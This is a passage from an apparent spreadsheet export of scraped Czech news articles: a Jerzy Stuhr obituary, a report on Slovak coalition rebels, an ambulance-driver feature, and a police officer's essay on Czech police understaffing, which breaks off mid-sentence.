světů – Příští století, O-bi, O-ba – Konec civilizace a Ga, ga – sláva hrdinům. Slavná Sexmise udělala z herce mezinárodní hvězdu V roce 1983 pak přišel zlom v hercově kariéře. Stuhr se stal velmi známým a oblíbeným doma i v zahraničí díky spolupráci s komerčně úspěšným režisérem Juliuszem Machulskim, kterému se též přezdívá polský Spielberg. Machulski mu nabídl hlavní roli Makse Paradyse v sci-fi komedii Sexmise. Film vyvolal mimořádný ohlas doma i v zahraničí, včetně tehdejšího Československa . Stuhr představoval jednoho ze dvou mužů, kteří se po hibernaci probudí do postkatastrofického světa ovládaného ženami. Jeho hrdina, požitkářský a přízemní chytrák, byl hlavním komediálním tahounem filmu. Sexmisí spolupráce s režisérem neskončila. Machulski Stuhrovi následně nabídl vděčnou vedlejší roli vládce trpasličí říše v komedii Kingsajz, dále úlohu nájemného zabijáka ve zdařilé parodii na americké gangsterky Déjà vu a konečně roli komisaře v krimikomediích Kiler a Kiler a ten druhý. Jen herectví mu nestačilo V devadesátých letech byl Jerzy Stuhr na vrcholu svých tvůrčích sil. Opět se pracovně spojil s Kieslowskim a natočil spolu s ním poslední díl Dekalogu a film Tři barvy: Bílá. Být pouhým hercem mu ale již nestačilo. Sám začal režírovat. Debutoval erotickou komedií na motivy povídky Jerzyho Pilcha Seznam cizoložnic, k níž napsal i scénář. Zřetelně přitom vycházel ze svého velkého vzoru Kieslowského. Natočil několik dalších úspěšných snímků, jako například Týden ze života muže. Ve svých filmech se obvykle zároveň obsadil i do hlavní role. Věnovat se začal také divadelní režii a v neposlední řadě začal učit na divadelních školách doma i v zahraničí. Postupně se tak propracoval k nejvšestrannějším tvůrcům polské kinematografie. Nezapomínal ostatně ani na dabing, mimo jiné nadaboval postavu oslíka ve všech pokračováních Shreka. Z jeho pozdějších filmových kreací lze jmenovat postavu Rádce v Zanussiho filmu Persona non Grata nebo profesora Henryka Skarżyńského v Blaschkeho Sonátě. Jerzy Stuhr obdržel řadu ocenění. Mimo jiné medaili Gloria artis od polského Ministerstva kultury nebo Řád Polonia Restituta 3. třídy za mimořádný přínos pro národní kulturu. Zdraví jej trápilo po desítky let Herce dlouhodobě trápilo zdraví. Již v roce 1988 prodělal srdeční infarkt. Svůj život po nemoci popsal v knize s názvem „Nemoci srdce, aneb můj život v umění“ z roku 1992. Krátce před smrtí uvedl v jednom z rozhovorů, že infarkt považuje za vůbec nejhorší nemoc, která ho potkala. „Infarkt byl horší… Protože s onkologickým onemocněním je to ještě jinak: doutná pomalu a tiše. A srdce najednou, najednou: bum! A vy nevíte, kde se to stane: jestli na jevišti, nebo na place, nebo doma, nebo se ženou. Takže je tu neustálý strach, že by vás to mohlo zasáhnout kdekoli a kdykoli,“ sdělil redaktorce s tím, že mimo tehdy byl patnáct minut. V září 2011 mu byla pro změnu diagnostikována rakovina hrtanu. V únoru 2016 měl druhý infarkt. V červenci 2020 prodělal mozkovou mrtvici. V roce 2023 se se mu vrátila rakovina a musel mu být odstraněn hrtan. V mezidobí se dostal do křížku se zákonem, když dne 17. října 2022 v Krakově způsobil během jízdy pod vlivem alkoholu dopravní nehodu. Z místa navíc ujel, aniž by poskytl zraněnému pomoc. Byl totiž natolik namol, že si vůbec nevšiml, že srazil cyklistu. Dostal pokutu a zákaz řízení na dobu tří let. Návratu za volant se již nedočkal, zemřel v rodném Krakově 9. července 2024. Dne 17. července 2024 po mši v kostele sv. Petra a Pavla byl jeho popel uložen v rodinném hrobě na rakowickém hřbitově v Krakově . Jméno Stuhr tím ale ze světa polské kinematografie nezmizelo. Jerzy byl od roku 1971 ženatý s houslistkou a kapelnicí Barbarou Kóskou, se kterou měl dvě děti. Syna Macieje a dceru Mariannu. Zatímco dcera se vydala jiným směrem a stala se výtvarnicí, syn Maciej se potatil a dnes patří mezi nejlepší polské herce. Český divák jej může znát jako detektiva Krauze z Rudého kapitána nebo z titulní role kriminálního seriálu Učitel. Zdroje: https://www.csfd.cz/tvurce/2381-jerzy-stuhr/prehled/ https://cs.wikipedia.org/wiki/Jerzy_Stuhr https://pl.wikipedia.org/wiki/Jerzy_Stuhr https://www.polsatnews.pl/wiadomosc/2023-06-30/wyrok-sadu-ws-znanego-aktora-jerzego-s/ https://www.onet.pl/?utm_source=pl.wikipedia.org_viasg_kultura&amp;amp;utm_medium=referal&amp;amp;utm_campaign=leo_automatic&amp;amp;pid=e4277819-a877-4e88-876b-f77f2384244f&amp;amp;sid=bf78661f-61f7-40de-becc-94f65255b9ae&amp;amp;utm_v=2&amp;amp;mp=promo https://kultura.onet.pl/fragmenty-ksiazek/jerzy-stuhr-nie-zyje-mowil-serce-nagle-znienacka-buch-i-nie-wiesz-gdzie-to-sie-stanie/642shee</t>
  </si>
  <si>
    <t>20241101_97_3264610945_e31cba85931cd847b807.html</t>
  </si>
  <si>
    <t>e31cba85931cd847b807</t>
  </si>
  <si>
    <t>Ficova vláda v křeči. Koalice bojuje s rebely, zachraňovat ji musel těžce nemocný poslanec Na papíře má Ficova vládní koalice celkem 79 hlasů ve 150členné Národní radě SR , tedy v jednokomorovém slovenském parlamentu. Relativně těsná, ale přece jen většina, se kterou může vládnout. ČTĚTE TAKÉ: Kiska je vinný z daňového podvodu, rozhodl soud. Slovenský exprezident dostal podmínku To by však nesměl nastat problém u Rudolfa Huliaka a jeho nejbližších kolegů. Poslanec zvolený na kandidátce Slovenské národní strany (SNS) místopředsedy parlamentu Andreje Danka se rozhodl přejít do otevřené rebelie. Huliak vede stranu Národní koalice, pro kterou žádá větší prostor ve vládní koalici. Po Dankovi třeba chtěl, aby v názvu jejich poslaneckého klubu byla zmíněna nejen SNS, ale i Huliakova Národní koalice. Když jej Danko odmítl, oba politici se rozkmotřili a Huliak vzal zbylé dva kolegy ze své strany – Pavla Ľuptáka a Ivana Ševčíka – z klubu SNS, čímž málem zanikl. Záchranu šéf SNS našel u Ficova Směru-SD, který mu „na hostování“ poslal poslance Dušana Muňka, čímž byla existence klubu uhájena. Huliakova rebelie však nekončí. Další hořkou pilulkou pro ně bylo odvolání nominanta jeho strany Štefana Kysela z čela Státní ochrany přírody SR. V uplynulých dnech tak Huliakova trojice vyhlásila stávku a odmítla se účastnit jednání v parlamentu. A jelikož zbývající hlas vládní většiny patří těžce nemocnému Jánu Blcháčovi z Hlasu-SD, bylo na spadnutí zablokování parlamentu, ve kterém by Ficova koalice nemusela nic schválit. Situaci zachraňuje těžce nemocný poslanec Situaci pro Ficovu koalici však zachránil právě Blcháč. Poslanec, který se od března léčí s rakovinou, byl doposud v nemocnici a v pracovní neschopnosti. V situaci, kdy kvůli Huliakově rebelii hrozila blokace Národní rady, se Blcháč ve středu objevil v poslanecké lavici, byť značně pohublý a s rouškou na obličeji. Podle informací portálu Nový ča s přitom ještě v úterý ležel v nemocnici. Sám Blcháč odmítá, že by ukončil svoji pracovní neschopnost účelově. „Koalice je funkční a (Igor) Matovič (slovenský expremiér a předseda hnutí Slovensko ; pozn. red.) a podobní se jdou roztrhat z toho, že jsem se rozhodl přijít do práce. Klidně by mi dopřáli nějakou nemoc, jen aby zablokovali parlament. Já se díky našim lékařům a sestrám cítím dobře a svobodně jsem se dnes rozhodl přijít do práce a přiložit ruku k dílu,“ napsal na svém facebookovém profilu poslanec Hlasu-SD. Dotazy na jeho konec pracovní neschopnosti považuje za „hyenismus“. Zmíněný Danko si neváhal kvůli Blcháčovu ukončenému pobytu v nemocnici navzdory těžké nemoci rýpnout do svého nového rivala. „Sobectví Huliaka a spol. je zodpovědné za to, že do parlamentu dnes musel přijít nemocný Ján Blcháč z Hlasu,“ pronesl Danko před médii. Huliak zároveň útočí na Danka . V rozhovoru pro Rádio Express se do šéfa SNS trefoval kvůli pití alkoholu . „ Andrej Danko by měl méně flirtovat s alkoholem a možná mu začne ta jedna buňka, co mu zůstala, nebo respektive to, co mu drží uši pohromadě, napovídat, že jsem se mu rok snažil vysvětlit, kde je můj problém,“ pronesl rebelující zákonodárce. V rozhovoru pro portál Aktuality.sk navíc dodal, že nyní po Dankově SNS požaduje vedení jednoho ministerstva. Původně se měl Huliak stát šéfem resortu životního prostředí, ale pro jeho kontroverzní názory jej tehdejší prezidentka Zuzana Čaputová odmítla jmenovat. Fico nakonec místo něj vybral Tomáše Tarabu a právě do něj Huliak dnes rovněž tepe. PODÍVEJTE SE: Fico v ruské televizi kritizoval EU. Efekt bude minimální, Kreml ho odpálkoval, říká Just</t>
  </si>
  <si>
    <t>20241101_98_3245251286_ea2c8cd22cbee8e6baba.html</t>
  </si>
  <si>
    <t>ea2c8cd22cbee8e6baba</t>
  </si>
  <si>
    <t>Naviják #132 - Terka Rutová - ženský muškařský workshop</t>
  </si>
  <si>
    <t>20241101_99_3264609499_e3a61d38bbe78581b2ed.html</t>
  </si>
  <si>
    <t>e3a61d38bbe78581b2ed</t>
  </si>
  <si>
    <t>Dupnout na brzdu v sanitce nejde. Je to závod o čas, občas i slalom, líčí řidič</t>
  </si>
  <si>
    <t>Dupnout na brzdu v sanitce nejde. Je to závod o čas, občas i slalom, líčí řidič Můj čas je pouhopouhé prozatím, zpívá se v ústřední písni k seriálu Sanitka. A není to nadsázka. Honza Šmarda jako řidič vozidel zdravotnické záchranné služby dobře ví, že jsou chvíle, kdy čas rozhoduje o životě a smrti. Jednou jeho tým zavolali k nastávající mamince s krvácením. Šlo o sekundy nejen pro dítě, ale i pro ni. „Udělali jsme základní vyšetření a bylo jasné, že je zle. Tak jsme prostě spěchali do nemocnice. A ono bylo zle,“ vypráví brněnský záchranář, který nedopustí, aby se mu říkalo jinak než Honza. Tento příběh skončil šťastně, protože se včas dostali na operační sál. A zásadní roli sehrálo i Šmardovo řidičské umění. Na starosti nemá pouze cestu, do lidských osudů zasahuje i na místě. Řidiči záchranky totiž v terénu asistují kolegům zdravotníkům při zákrocích, musí tedy ovládat i adekvátní úroveň první pomoci. Jihomoravská záchranná služba si proto své kouzelníky za volantem vychovává sama. Musíme obejít třeba třicet aut, než se dostaneme s nosítky na chodník. A někdy neprojdeme ani s batohy. Honza Šmarda řidič-záchranář Šmarda se k profesi dostal náhodou, je vyučený zedník. Jeho životem zamíchala branná povinnost. „Přiznám se, byl jsem mladý, zamilovaný, nechtělo se mi na vojnu. Tak jsem si podal žádost na civilní službu, že mám odpor ke zbraním, k násilí a ke krvi,“ vzpomíná. Zbraním se sice vyhnul, krvi už ovšem ne. Místo armády se ocitl u převozové služby, která zajišťuje třeba transport pacientů na dialýzu. A spolupracuje i se záchranáři, většinou u hromadných neštěstí. Není tedy divu, že kroky mnohých odtud vedou na záchranku, kde pak absolvují příslušné kurzy. Tak to bylo i u Šmardy, který s „rychlou“ jezdí už dvacet let. 4 fotografie A nejde jen o běžné sanitky. Jako člen takzvaného týmu specializovaných činností na základně v brněnských Bohunicích usedá i za volant terénní toyoty či velkokapacitního vozidla určeného pro mimořádné události. Speciální vůz mají záchranáři i pro bariatrické pacienty, tedy ty s morbidní obezitou, a pro pacienty s vysoce nakažlivou nemocí. Ke křižovatkám s opatrností Dramatické zápletky nejsou součástí každé cesty. Dispečink na lince 155 rozlišuje čtyři stupně naléhavosti, které regulují rychlost jízdy. Ty nejnižší v podstatě nahrazují dřívější lékařskou výjezdní pohotovost a často se týkají případů, kdy lidé volají sanitku v situacích, které by mohli řešit sami. Záchranáři se tak někdy během dvanáctihodinové směny vůbec nevrátí na základnu, protože ještě při zpáteční cestě je volají k novým případům. Pro Šmardu není výjimkou ani devět výjezdů za službu. Pokud operátoři nahlásí nejvyšší naléhavost 1A, začíná závod o život. Tam už se na sanitku žádná omezení rychlosti nevztahují. A obzvlášť tehdy do hry vstupují i ostatní účastníci provozu. Ke šťastnému konci pomáhá záchranářská ulička, kdy auta vytvoří pro vozidla integrovaného záchranného systému koridor pro rychlý a bezpečný průjezd. „Myslím, že na dálnicích se to už řidiči celkem naučili, tam si asi nemůžeme stěžovat,“ hodnotí přispění veřejnosti řidič-záchranář. Kromě běžné sanitky usedá řidič-záchranář Honza Šmarda i za volant velkokapacitního vozu určeného pro mimořádné události. O dalších silnicích to však říct nemůže. Ve městech sanitka naráží na nepozorné či bezohledné řidiče i cyklisty. Někteří chodci si zase na přechodu ťukají na čelo, jako by spěch záchranářů nechápali. Šmarda si tak někdy připadá jako při slalomu. Ke křižovatkám se přibližuje už z dálky opatrně pro případ, že někdo nepostřehl houkání ani světelnou signalizaci sanitky. Někdy totiž musí zpomalit i o šedesát kilometrů v hodině, a pokud veze pacienta, prudké sešlápnutí brzdy nepřipadá v úvahu. Problém je také s odstupy aut mezi sebou. Při dopravních omezeních, jako byla ta kvůli stavbě tunelů v brněnské ulici Žabovřeská, si řidiči nechávají prostor pouze na to, aby se vzájemně pustili do zúžení. Čtyřiačtyřicetiletý kočí „jednotky intenzivní péče na kolečkách“ nad tím krčí rameny. „Lidé už nepřemýšlí, že by si měli trošku držet místo na to, kdyby potřebovali uhnout,“ podotýká. Příliš těsné parkování Když na vozovce zrovna není místo, kam se uklidit před sanitkou, je rada jednoduchá: prostě jet dál a uhnout až tam, kde to možné je. „Jde o to, hledat ten nejširší prostor. Také je důležité, aby lidé dali najevo, že o nás vědí, ideálně pomocí blinkru. Uhýbají doprava, tak vyhodí blinkr doprava. Já vím, že o mně vědí, a objedu je zleva,“ vysvětluje Šmarda. „Ale celkově se to rozhodně zlepšuje,“ uznává. Důležité minuty šoférům sanitek a jejich pacientům kradou i jiné překážky. Na některých sídlištích stojí auta tak nevhodně, že mezi nimi sotva jde projet. Někde to vyřešilo rezidentní parkování, ale vyvstal zase jiný problém, například v ulici Oblá. Vozy jsou tam na parkovišti napěchované tak těsně, že mezi nimi záchranáři s nezbytným vybavením neprojdou. „Musíme obejít třeba třicet aut, než se dostaneme s nosítky na chodník. A někdy neprojdeme ani s batohy,“ přibližuje Šmarda. Potíže někdy bývají i se závorami. Zatímco ve velkých obchodních centrech je většinou nepřetržitě hlídá obsluha, která záchranáře pustí, na soukromých parkovištích to tak nefunguje. „Když si při vjezdu vezmu lístek a něco tam dělám, jsem tam třeba dvacet minut, ale volné parkování platí jenom na patnáct. Pak přijedu k závoře, chci vyjet a lístek mi nefunguje. Tak zvoním na obsluhu, která sedí daleko a nereaguje,“ popisuje Šmarda úskalí. Zatím se mu to nestalo u závažných případů, ale kdyby šlo o život, jediným řešením by bylo poškodit majetek, což by pak šlo na jeho účet. Čas je ovšem u akutních případů k nezaplacení, jak koneckonců vyznívá i ze zmíněné skladby ze seriálu Sanitka. Šmarda ji ostatně sám před časem měl jako vyzvánění na mobilu. Maminka i s manželem přišla Honzovi Šmardovi (na snímku druhý zprava) s kolegou vyjádřit vděk za záchranu při komplikovaném porodu dcery. Když všechno dobře dopadne, lidé dokážou projevit vděk. Maminka, kterou zachránili včasným transportem na operační sál, přišla svým hrdinům později s dcerou i manželem osobně poděkovat. Nedávno zase Šmarda šel s kamarádem na pivo a potkal povědomého pána – ukázalo se, že ho předtím vezl kvůli bolavým zádům. Když pak šel řidič sanitky v hospodě zaplatit, zjistil, že už není co. Jiné paní zase před lety pomohl zachránit život krátce předtím, než se jí narodilo vnouče. Před Vánocemi pak dostal dopis, v němž dotyčná děkovala za čas, který může s vnoučaty strávit. Co dělat, když okolo spěchá sanitka? Pokud byste zastavením zablokovali silnici, raději jeďte dál. Ideálně hledejte nejširší místo, kde uhnete. Jestliže je nutné popojet přes červenou na semaforu, vyjet na chodník nebo vyrazit na kruhový objezd, učiňte tak. Nezapomínejte ovšem na vlastní bezpečí. Pokud můžete, uhýbejte do pravého pruhu, aby zrychlený levý pruh zůstal volný pro sanitku. Pamatujte, že pro bezpečný průjezd všech vozidel integrovaného záchranného systému (IZS) jsou potřeba tři metry. Dejte najevo řidiči sanitky, že o ní víte, tedy vyhozením blinkru. Buďte obezřetní, protože může jet víc vozů IZS za sebou. Udržujte si odstup od ostatních aut kdekoliv v provozu, abyste v případě potřeby mohli vytvořit záchranářskou uličku. Chodci a cyklisté, při průjezdu sanitky nevstupujte a nevjíždějte do křižovatky, ani pokud máte zelenou. Setrvejte na chodníku nebo u krajnice. Kromě toho, že sanitku musí co nejdřív dostat do cíle, pomáhá Honza Šmarda s první pomocí v terénu. Autor: Radim Strachoň, MAFRA Kromě běžné sanitky usedá řidič-záchranář Honza Šmarda i za volant velkokapacitního vozu určeného pro mimořádné události. Autor: Radim Strachoň, MAFRA Řidič-záchranář Honza Šmarda působí u „rychlé“ dvacet let. Autor: Radim Strachoň, MAFRA Maminka i s manželem přišla Honzovi Šmardovi (na snímku druhý zprava) s kolegou vyjádřit vděk za záchranu při komplikovaném porodu dcery. Autor: ZZS JMK Autor: Zuzana Motalová Autor person Zuzana Motalová Rubrika transition_slide Brno - Zprávy</t>
  </si>
  <si>
    <t>20241201_1_3480029930_07990bfa16d9bfa90571.html</t>
  </si>
  <si>
    <t>07990bfa16d9bfa90571</t>
  </si>
  <si>
    <t>Tragický a zoufalý stav Policie České republiky</t>
  </si>
  <si>
    <t>Tragický a zoufalý stav Policie České republiky Podle ruského zdroje je Bašár Asad a jeho rodina v Moskvě AfD ve svém volebním programu vyzývá Německo k vystoupení z EU Smrtelné křeče… Rozhovor Tuckera Carlsona se Sergejem Lavrovem : nejdůležitější momenty Související zprávy Podle ruského zdroje je Bašár Asad a jeho rodina v Moskvě AfD ve svém volebním programu vyzývá Německo k vystoupení z EU Smrtelné křeče… Rozhovor Tuckera Carlsona se Sergejem Lavrovem : nejdůležitější momenty Tragický a zoufalý stav Policie České republiky čtení 79 min. Vkládám dosti dlouhý, ale velmi zajímavý článek o zoufalém stavu policie v České republice . Napsal ho policista, který pracuje u policie 20 let. Stovky policistů, hasičů a dalších příslušníků bezpečnostních sborů se sešly před ministerstvem vnitra na Letné minulý týden 21. listopadu. Protestovali proti nízkým platům a špatné personální situaci. Předseda pořádající Unie bezpečnostních složek ( UBS ) Aleš Lehký v úvodním projevu řekl, že vláda neplní vlastní programové prohlášení, a připomněl slib ministra vnitra Rakušana zvýšit platy o deset procent. Podporu akci vyjádřily nejen odborové svazy hasičů a policistů, ale i vězeňské služby, celníků, městské a obecní policie či sdružení horské služby . Proto je tento článek aktuálnější než kdykoliv předtím. Transparent při protestu policistů v Praze 21.11.2024 ***** **** Víte… Víte o tom, že jsou místa, kde jsou ve službě dva policisté na několik desítek tisíc lidí? Víte o tom, že máme zakázáno používat slovo „podstav“, který je téměř úplně všude? Víte o tom, že se pravidelně slučují jednotlivé služebny policie, čímž se zvětšuje oblast a počet lidí, pro které musí být k dispozici uvedení dva policisté? Víte o tom, že máme striktně zakázáno, předávat informace o kolabující policii a podstavu nadřízeným, natož vedení policie? Víte o tom, že jsme za poslední dva roky přijali přes 500.000 uprchlíků a zároveň snižovali rozpočet policie? Víte o tom, že když bydlíte mimo Prahu , jste pohledem policejních postupů občanem druhé kategorie? Víte o tom, že z policejního rozpočtu se trvale platí hlídání sportovních a kulturních akcí, tedy soukromé akce, ze kterých má někdo zisky? Víte o tom, že dost policistů se dostane na střelnici jednou maximálně dvakrát za rok (někteří vůbec)? Víte o tom, že administrativní zátěž policistů a administrativní výmysly dosáhly u PČR takových rozměrů, že není důležitý výsledek (chycení pachatele, vrácení odcizené věci majiteli, atd.) ale to, jestli máte ve spise razítka na správném místě, označení dokumentů, které se dále nevyužívá, atd.? Víte o tom, že je úplně jedno, jak policista provedl zákrok? Je důležité, jestli měl na hlavě čepici a co na to řeknou lidé na sociálních sítích. Víte o tom, že u policie slouží velké množství policistů, kteří nejsou policisté (nikdy policejní práci ani neviděli) a stejně budou příjemci renty? Víte o tom, že policie, která by měla hlídat dodržování zákona, při jednání s policisty sama zákon porušuje a dlouhodobě prohrává soudní spory, což nás všechny stojí nemalé peníze? Víte o tom, že policie je prolezlá politikou, ačkoliv by měla být apolitická? Víte o tom, že policii nejvíc nezatěžuje trestná činnost ale pojišťovny, exekutoři, soudy, advokáti, základní školy, dětské domovy, občanskoprávní spory, atd. Víte o tom, že i když je škoda trestným činem např. 15 tis Kč a je jasné, že není šance pachatele vypátrat, vyhodnocují se stopy za 20 tis. Kč? Výše uvedené otázky a mnoho dalších bych vám chtěl vysvětlit v následujícím textu. I když se o tom nesmí mluvit, policie jako taková jistým způsobem zkolabovala a už funguje jen setrvačně. Pro lidi už nemá kdo sloužit, ale na ministerstvu vnitra a policejním prezidiu se stále tancuje a hlavně se tvrdí lidem, jak všechno funguje bezvadně… Bude to dlouhé, budu skákat z místa na místo, místy to asi ani nebude dávat smysl, ale pokusím se to vysvětlit co nejlépe. Jmenuji se… (k tomu se dostaneme). Pracuji u Policie ČR dvacet let. Deset let jsem byl řadový policista, posledních deset let pracuji jako vedoucí útvaru. Miloval jsem svojí práci a chodil do práce s radostí, ale už to tak nemám. Politický amatérismus, neschopné vedení policie a impotence policejních odborů policii přivedla k personálnímu i finančnímu krachu. Z mého pohledu není jiná cesta než komplexní obsáhlá reforma policie. Prostě už to nejde dál. Už nemohu přihlížet tomu, jak ohýbají počty policistů, jak z občanských zaměstnanců dělají policisty (aby mohli dále lhát), jak neustále zvyšují počet „policistů“, kteří něco „řídí“ nebo „kontrolují“, jak neustále zvyšují pracovní a administrativní zatížení policistů v brutálních podstavech, jak okázale dělí policisty na „chovné“ a na „tažné“, jak policistům nedají prostor k základnímu výcviku, jak utrácejí nesmyslně peníze, atd. Máme nejvíce policistů v Evropě ? Jakmile se řeší situace u policie, téměř vždy se objeví věta, že máme nejvíce policistů v Evropě . Celkově tyto statistické pohledy nemám rád. Téměř každá statistika se dá ohnout tak, aby vyhovovala potřebám, které chcete podpořit. Vůbec netvrdím, že tato statistika není pravdivá. Jenže pokud chceme takové tvrzení vytáhnout, měli bychom také srovnat činnost policejních sborů v jednotlivých státech a hlavně rozdělit počet policistů na výkonné a řídicí. Již mnoho let počet výkonných policistů klesá a počet policistů, kteří něco řídí nebo kontrolují, neustále stoupá. Policejní prezidium nabobtnalo do obludných rozměrů. Je to jediné místo v celé policii, kde není ani náznak podstavu. Rovněž je třeba připomenout jeden velký nešvar poslední doby. Aby se zakryl (kromě jiného) klesající počet výkonných policistů, začala policie z různých občanských zaměstnanců dělat policisty (administrativní pracovníci, správci sítě, personální pracovníci, atd.). Tímto fíglem nevypadají klesající počty policistů tak hrozivě. Já se k tomuto problému (přeměna občanských zaměstnanců na policisty) ještě vrátím, nyní zpátky k celkovému počtu výkonných policistů. Jak už jsem psal, jsem vedoucím na základním útvaru (obvodní oddělení). Útvaru, který má na starosti okresní město a přilehlé obce. Celkem to dělá necelých 40 tisíc obyvatel, které máme na starosti. Na tento počet obyvatel mám aktuálně k dispozici 1 autohlídku o 2 policistech. NIC VÍC. Teď už jsme se dostali do takové situace, že abych vůbec byl schopný na každý den a noc naplánovat alespoň jednu autohlídku, musím se domlouvat s okolními útvary (ty, které jsou toho vůbec schopné), jestli nám na určité služby pošlou na výpomoc policistu. Policistu, který náš obvod nezná, nezná místní problematická místa a problémové osoby. Takže tady potom mám jednu autohlídku, ve které jsou dva policisté většinou s policejní praxí do 3 let, a ještě k tomu jeden z nich vůbec nemá o místě přehled. Znovu opakuji na téměř 40 tisíc obyvatel. Když jsem začínal jako řadový policista, bylo nás na útvaru 60. Jistým pohledem jsem i já ochotný říct, že to bylo zbytečně mnoho. Potom někdo přišel s tím, že je třeba zredukovat počet policistů (Samozřejmě se redukoval jen počet policistů na základních útvarech, to znamená policistů, kteří jsou s občanem denně v kontaktu a vyjíždějí na pomoc, neredukoval se počet policistů ve vedení.) a rázem nás bylo 40. Postupem času se toto číslo měnilo. V současné době nás má být 45. Situace je taková, že ve skutečnosti nás je 30 (včetně mě). Za pár let jsme se tedy dostali na polovinu. To vážně nikomu nepřijde divné? Kde jsou novináři, aby se ptali? Nejhorší je, když se ptají vedení policie. Tam se pravda nevyskytuje, běžte se ptát na základní útvary (obvodní a místní oddělení). Pokud se tedy řadoví policisté nebudou bát s kýmkoliv mluvit. Jakákoliv stížnost nebo poukázání na stav policie se v současné době velmi přísně trestá (je to absolutně zakázané). Pokud se domníváte, že taková situace může být jen výjimka, byl by to velký omyl. Jen na našem okrese je následující situace: Náš útvar: mělo by být 45 policistů – ve skutečnosti je 30 policistů Útvar z jedné strany: mělo by být 16 policistů – ve skutečnosti je 7 policistů Útvar z druhé strany: mělo by být 16 policistů – ve skutečnosti je 11 policistů Mějte na paměti, že číslo „mělo by být“ je výplodem někoho od stolu v Praze při úžasné početní reformě. A tak bych mohl pokračovat dál a dál. Po dvaceti letech u policie mám kamarády u policie po celé republice. Tato situace je všude. Zavírají se oddělení. Na mnoha místech je situace taková, že se sice nezavřela oddělení, ale výkon služby se slučuje. To znamená, že se spojí 1 policista z jednoho oddělení s policistou z druhého oddělení a mají společnou hlídku na území těchto dvou (mnohdy i více) obvodů. To jsou tak obrovská území, že bych se raději ani nepouštěl do úvahy nad dojezdovým časem takové hlídky z jednoho konce spojeného obvodu na druhý. Přesně slyším, jak mi někdo z vedení oponuje, že se tam pošle hlídka, která je blíže. Jasně ta jedna hlídka na celý jiný rajón. To na našem útvaru známe velmi dobře. Hlídka z mého útvaru je občas také vyslána do jiného rajónu (obvodu). V takovém případě ale nastává situace, že na celé okresní město není přítomna žádná hlídka Policie ČR. Pokud tedy v této době potřebujete pomoc a zavoláte na tísňovou linku, mohou nastat jen dvě situace. V prvním případě je vám na pomoc vyslána nejbližší hlídka, což v našem případě znamená dojezd minimálně 12 minut (pokud tato hlídka zrovna sedí v autě a ihned vyjede). Ve druhém případě je na místo vyslána hlídka městské policie (o městské policii níže v textu). V tomto ohledu je důležité další věc – psychika policistů při výjezdu na místo. Jsou si vědomi toho, že když bude zle, budou čekat velmi dlouho, než dorazí nějaká pomoc/podpora. Taková je současná realita u policie. Když tuto situaci přenesete někam výše, dozvíte se, že když to nezvládá jeden útvar, zvládne to jiný. A když to nezvládne žádný útvar v daném okrese, zvládne to jiný okres (Zamyslete se nad tím, jak daleko je to do sousedního okresu.). Možná máme nejvíce policistů v Evropě . Určitě ale ne na ulicích, kde by byli připraveni pomáhat lidem. Vzpomínáte ještě na dobu, kdy jste na ulici potkávali pěší hlídku policie? Kdy jste nějakou potkali? To už vůbec neexistuje. Přitom to přinášelo tolik prospěšného. Doba, kdy byla pěší policie v ulicích, je dávno pryč. Nyní ale nastává další zlom. Budeme se muset smířit s tím, že policie nebude v každé trochu větší obci a dojezdové časy budou mnohem delší. Ale ministr vnitra i policejní prezident nadále hlásí do světa, jak je všechno v pořádku. Policejní prezident k tomu ještě pro policisty točí videa. Nikdy nevím, jestli u toho videa brečet, nebo se mám smát. A domnívám se, že to tak má většina policistů. Buď má úplně zkreslené informace o sboru, takže absolutně netuší, co se děje, nebo to dobře ví a vesele lže dál. Která varianta je horší, ať si každý určí sám. Na začátku této kapitoly jsem psal, že pokud se chceme bavit o početních stavech a srovnat je s okolními státy, měli bychom také řešit činnost a úkoly policie. To je další obrovský problém. Policie je „děvka pro všechno“ (omlouvám se za ta slova, lépe to vystihnout nejde). Začíná to tím, že cokoliv politici řeší (jsou mezi sebou ve „válce“, něco „srmdí“, lidé jsou z něčeho naštvaní, novináři něco „vyšťourají“, atd.), ihned se vystaví v televizi a prohlásí, že to nechají prověřit policií. Pokračuje to přes občany, kteří se obracejí na policii s věcmi, které policii absolutně nepřísluší řešit. Jenže u policie si všichni hlídají svá místa a nikdo nemá odvahu na to, aby řekl – tohle a tohle už prostě policie řešit nebude, takže policie jako beránek šetří. Absolutně se tím nerespektuje zásada ULTIMA RATIO, na což opakovaně upozorňuje i Ústavní soud. Zásada ultima ratio je často vyjadřována také jako tzv. subsidiarita trestní represe. Z principu ultima ratio vyplývá, že použití trestního práva je možné pouze tam, kde jiné prostředky ochrany práv fyzických či právnických osob selhaly, případně se ukázaly jako nedostatečné či nevhodné. Trestní právo by tedy v praxi mělo fungovat jako poslední, nikoliv jako první nástroj pro nápravu sporů či problémů ve společnosti. Přístup občanů vídám každý den i na sociálních sítích. Jsem v několika skupinách, kam lidé chodí pro rady v různých životních situacích. Podle mého odhadu je asi 70 % procent odpovědí stejných – dojděte s tím na policii, oni to prošetří a pošlou to dál. Je to takové univerzální zaklínadlo. A proč by vlastně nebylo? Je to nejjednodušší a je to zdarma. Jenže i s ohledem na výše uvedené počty už to prostě není možné. I kdyby počty byly v pořádku, nemůže být systém nastavený takto. A pokud se bavíme o srovnání s jinými státy, domnívám se, že asi nikde jinde to takto nefunguje. Stalo se vám někdy něco v zahraničí? Já jsem tu smůlu měl a nestačil jsem se divit – s věcí, která by u nás skutečně byla pro policii, mě odkázali na mou pojišťovnu. Žádné sepisování, žádné potvrzení, prostě jen odkaz na pojišťovnu. A končí to tím, že policii nejvíce zatěžují další subjekty (státní i soukromé) a situace, jak už jsem psal v samotném úvodu v otázkách. Jedná se především o pojišťovny, exekutory, soudy, advokáty, základní školy, dětské domovy, kulturní akce a sportovní utkání, soukromé bezpečností agentury, požáry, náhlá úmrtí (koroneři), občanskoprávní spory, atd. Pojišťovny Ačkoliv pro takový postup nemají pojišťovny oporu v zákoně, žádají přítomnost policie prakticky u všeho, kde hrozí, že pojišťovna bude muset vyplatit pojistné plnění. Pro příklad: Již mnoho let je zákon nastavený tak, že velkou část dopravních nehod je možné vyřešit tzv. euroformulářem (malé nehody, střety se zvěří) bez přítomnosti policie. I tak pojišťovny stále trvají na přítomnosti policie, ačkoli k tomuto není žádný zákonný důvod. Pokud pojištěný policii na místo nezavolá, začne se pojišťovna vykrucovat z pojistného plnění, neboť údajně byly porušeny všeobecné podmínky pojištění. Neměly by takové podmínky být v souladu se zákonem? Proč soukromé pojišťovny svou vlastní vůlí zatěžují policii? Proč se policie proti tomu nebrání? A není to jen o euroformuláři. Pojišťovny vymáhají po pojištěném přítomnost policie i v dalších případech, kdy je od začátku zřejmé, že se 